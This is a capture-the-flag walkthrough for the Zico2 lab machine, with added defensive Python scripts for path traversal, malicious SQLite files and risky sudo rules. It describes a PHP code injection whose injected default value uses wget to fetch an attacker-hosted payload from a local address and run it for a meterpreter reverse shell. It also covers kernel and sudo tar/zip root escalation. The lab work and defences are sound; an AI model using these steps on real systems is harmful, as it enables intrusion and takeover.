ZICO 2
- Layout for this exercise:
1 - INTRODUCTION
- The goal of this exercise is to develop a hacking process for the vulnerable machine Zico2.
- Zico2 can be downloaded from here:
https://www.vulnhub.com/entry/zico2-1,210/
- Once downloaded and extracted with VMware:
2 - ENUMERATION
- Looking for zico2's IP:
- Scanning with Nmap:
- Dirbusting the web server, we find an interesting folder, dbadmin:
- Running dirsearch.py, we also discover view.php:
- Let's explore both view.php and /dbadmin.
- Connecting to the web server:
- Scrolling down and clicking on the "tools" link:
- So view.php invites a Local File Inclusion test, which turns out to allow Directory Path Traversal:
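From the defender's side, the flaw behind this LFI is a page parameter handed to include() without validation. The following Python sketch is an added example written for this page, not code from the write-up or from the Zico2 machine: it models the vulnerable lookup next to a hardened one that canonicalises the requested path, confines it to the web root and checks it against an allow-list. The web root, the file names and the allow-list are constructed for the demo and are not paths from the machine.

```python
import tempfile
from pathlib import Path

# Constructed layout: a throw-away web root plus one file that sits outside
# it. The file names are illustrative and are not paths from the machine.
BASE = Path(tempfile.mkdtemp(prefix="lfi-demo-")).resolve()
WEBROOT = BASE / "www"
WEBROOT.mkdir()
(WEBROOT / "tools.html").write_text("<h1>tools</h1>\n")
(WEBROOT / "about.html").write_text("<h1>about</h1>\n")
OUTSIDE = BASE / "secret.txt"
OUTSIDE.write_text("root:x:0:0:root:/root:/bin/bash\n")

# Pages the application actually publishes; everything else is refused.
ALLOWED_PAGES = {"tools.html", "about.html"}


def vulnerable_include(page: str) -> str:
    """Model of include($_GET['page']) with no validation. The '../' in the
    request survives the join, so any readable file can be pulled in."""
    with open(WEBROOT / page, "r") as fh:
        return fh.read()


def safe_include(page: str) -> str:
    """Hardened lookup. resolve() collapses '..' and follows symlinks, the
    parents check confines the result to WEBROOT, and the allow-list rejects
    anything the application does not intend to serve."""
    candidate = (WEBROOT / page).resolve()
    if WEBROOT not in candidate.parents:
        raise PermissionError(f"path escapes web root: {page!r}")
    if candidate.name not in ALLOWED_PAGES:
        raise PermissionError(f"page not allowed: {page!r}")
    return candidate.read_text()


def is_blocked(page: str) -> bool:
    """True if the hardened lookup refuses the request."""
    try:
        safe_include(page)
    except PermissionError:
        return True
    return False


def demo() -> dict:
    """Send the same traversal through both lookups and report the outcome."""
    traversal = "../secret.txt"
    return {
        "vulnerable_leaked": vulnerable_include(traversal).startswith("root:"),
        "safe_blocked": is_blocked(traversal),
        "safe_serves_allowed": safe_include("tools.html").startswith("<h1>tools"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The order of the checks matters: canonicalise first, then test containment, then apply the allow-list. Checking the raw string for "../" alone is not enough, because absolute paths, encoded separators and symlinks inside the web root all bypass a substring filter while still resolving outside it.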
- Now it's time to explore dbadmin:
- Clicking test_db.php:
- Default password for phpLiteAdmin is admin:
https://www.acunetix.com/vulnerabilities/web/phpliteadmin-default-password/
- It is possible to create new databases:
3 - EXPLOITATION - REMOTE PHP CODE INJECTION
- Searching for phpLiteAdmin vulnerabilities, we find an exploit for Remote PHP Code Injection, which allows code to be injected into the server remotely:
- Reading the first lines of the 24044.txt exploit:
- Going to exploit-db:
- Following the instructions, let's create the database hack.php:
- Adding a test table, prueba:
- Entering the Default Value <?php phpinfo()?>:
- Using the LFI in view.php, we can include the newly created database file and confirm that the exploit works:
- Why not take advantage of this Remote PHP Code Injection exploit to upload a payload and spawn a reverse shell?
- msfvenom helps us create the payload:
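What makes this work is that phpLiteAdmin writes its database as a file whose name the user chooses, and SQLite stores schema text (such as a column DEFAULT) verbatim inside that file. A defender can therefore spot the artefact directly: a SQLite file with an executable-looking extension, or one with a PHP open tag in its bytes. The scanner below is an added example written for this page, not code from the write-up or the phpLiteAdmin project. It scans a constructed temp directory standing in for the machine's /usr/databases; the accepted extension list is an assumption to adjust per deployment.

```python
import sqlite3
import tempfile
from pathlib import Path
from typing import Dict, List

SQLITE_MAGIC = b"SQLite format 3\x00"           # 16-byte header of every SQLite 3 file
DB_EXTENSIONS = {".db", ".sqlite", ".sqlite3"}  # assumption: the extensions we expect
PHP_TAGS = (b"<?php", b"<?=")


def scan_database_dir(directory: Path) -> List[Dict]:
    """Walk `directory` and report SQLite files that carry a non-database
    extension or embed a PHP open tag in their bytes (schema text such as a
    column DEFAULT is stored verbatim in the file, which is what the exploit
    relies on)."""
    findings = []
    for path in sorted(Path(directory).rglob("*")):
        if not path.is_file():
            continue
        data = path.read_bytes()
        if not data.startswith(SQLITE_MAGIC):
            continue
        reasons = []
        if path.suffix.lower() not in DB_EXTENSIONS:
            reasons.append(f"sqlite database stored with extension {path.suffix!r}")
        if any(tag in data for tag in PHP_TAGS):
            reasons.append("php open tag embedded in database contents")
        if reasons:
            findings.append({"path": str(path), "reasons": reasons})
    return findings


def build_sample_dir() -> Path:
    """Constructed fixture: one benign database and one shaped like the
    exploit artefact (a .php file name and a PHP default value). The
    directory is a temp dir, not the machine's /usr/databases."""
    base = Path(tempfile.mkdtemp(prefix="dbadmin-demo-"))
    con = sqlite3.connect(str(base / "users.db"))
    con.execute("CREATE TABLE users (id INTEGER, name TEXT DEFAULT 'anon')")
    con.commit()
    con.close()
    con = sqlite3.connect(str(base / "hack.php"))
    con.execute("CREATE TABLE prueba (campo TEXT DEFAULT '<?php phpinfo() ?>')")
    con.commit()
    con.close()
    return base


if __name__ == "__main__":
    for finding in scan_database_dir(build_sample_dir()):
        print(finding["path"])
        for reason in finding["reasons"]:
            print("  -", reason)
```

The structural fix is to keep database files outside any directory the web server will include from and to have the admin tool enforce a fixed extension; the scan above is the check that confirms neither assumption has silently broken.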
- Giving execution permissions:
- Setting a meterpreter session:
- Creating table 1 in database /usr/databases/hack.php:
- Now it is important to analyze in detail the Default Value entered in Field 1:
- system() -> executes an external program and displays its output
- cd /tmp -> changing to the writable folder /tmp
- wget http://192.168.1.19:8000/myshell -> transferring the exploit from Kali to Zico2
- chmod 755 -> giving the exploit execution permissions
- ./myshell -> running the exploit
- view.php? helps us run the exploit remotely:
- As a result, a meterpreter session is obtained:
- Getting a shell:
4 - PRIVILEGE ESCALATION
- Improving the shell:
- Let's explore two ways for Privilege Escalation:
4.1 - Kernel exploitation
- The kernel is vulnerable to this exploit, which allows Local Privilege Escalation:
www.exploit-db.com/exploits/33589
- Copying and pasting the C program vnik.c to our local Kali machine:
- Transferring vnik.c from Kali to Zico2:
- Compiling vnik.c according to the instructions:
- Running vnik, a root shell is obtained:
4.2 - Abusing tar and zip
- Listing /home/zico:
- Going to /wordpress:
- Reading wp-config.php, we discover interesting credentials for the user zico:
- Using these credentials:
- zico is a sudoer able to run /bin/tar and /usr/bin/zip as root:
- tar and zip can run external commands supplied on the command line, which can be used for Privilege Escalation:
http://blog.securelayer7.net/abusing-sudo-advance-linux-privilege-escalation/
https://www.gnu.org/software/tar/manual/html_section/tar_29.html
- For instance, tar can be used to spawn a root shell in this way:
- In a similar way, zip can be used to spawn a root shell:
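The weakness here is not tar or zip themselves but the sudo rule that grants them as root. A small audit that parses sudoers user specifications and flags binaries able to run external commands from their own command line catches this class of misconfiguration before anyone reaches the box. The script below is an added example written for this page, not code from the write-up; the sample sudoers text is constructed, with the zico line loosely modelled on the rule found above (the NOPASSWD tag is an assumption), and the flagged-binary set contains only the two names from this page and should be extended from a maintained reference.

```python
import re
from typing import Dict, List

# Binaries that can be handed an external command on their own command line.
# tar and zip are the two from this write-up; the set is an assumption the
# reader should extend from a maintained reference rather than a complete list.
SHELL_ESCAPE_BINARIES = {"tar", "zip"}

# user  host=(runas)  [TAG:] cmd, cmd ...   (aliases and continuations not handled)
RULE_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>[^=\s]+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$"
)
TAG_RE = re.compile(r"^(?:NOPASSWD|PASSWD|SETENV|NOSETENV|NOEXEC|EXEC):\s*")

# Constructed sample; the zico line is modelled on the rule found on the box
# (the NOPASSWD tag is an assumption for the example).
SAMPLE_SUDOERS = """\
Defaults        env_reset
root     ALL=(ALL:ALL) ALL
zico     ALL=(root) NOPASSWD: /bin/tar, /usr/bin/zip
www-data ALL=(root) NOPASSWD: /usr/sbin/service apache2 restart
"""


def parse_sudoers(text: str) -> List[Dict]:
    """Minimal parser for user-specification lines: skips comments, Defaults
    and alias definitions; a NOPASSWD tag is recorded at rule level."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith(("Defaults", "User_Alias", "Cmnd_Alias",
                                        "Host_Alias", "Runas_Alias")):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        commands, nopasswd = [], False
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            tag = TAG_RE.match(cmd)
            if tag:
                nopasswd = nopasswd or cmd.startswith("NOPASSWD:")
                cmd = cmd[tag.end():].strip()
            if cmd:
                commands.append(cmd)
        rules.append({"who": m.group("who"), "host": m.group("host"),
                      "runas": m.group("runas") or "root",
                      "nopasswd": nopasswd, "commands": commands})
    return rules


def audit(rules: List[Dict]) -> List[Dict]:
    """Flag every command whose binary can run external commands from its
    command line. 'ALL' is skipped: unrestricted sudo is a separate policy
    question, not a shell-escape finding."""
    findings = []
    for rule in rules:
        for cmd in rule["commands"]:
            if cmd == "ALL":
                continue
            binary = cmd.split()[0].rsplit("/", 1)[-1]
            if binary in SHELL_ESCAPE_BINARIES:
                findings.append({
                    "who": rule["who"], "runas": rule["runas"],
                    "nopasswd": rule["nopasswd"], "command": cmd,
                    "risk": f"{binary} can run external commands supplied on its command line",
                    "fix": "remove the rule or replace it with a wrapper that fixes every argument",
                })
    return findings


if __name__ == "__main__":
    for f in audit(parse_sudoers(SAMPLE_SUDOERS)):
        print(f"{f['who']} -> {f['command']} as {f['runas']}: {f['risk']}")
```

Run it against /etc/sudoers and each file under /etc/sudoers.d; the parser deliberately ignores aliases and line continuations, so a rule hidden behind a Cmnd_Alias needs the alias expanded by hand before the audit sees it.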
5 - CAPTURING THE FLAG
- Inside the /root folder we can read the file flag.txt: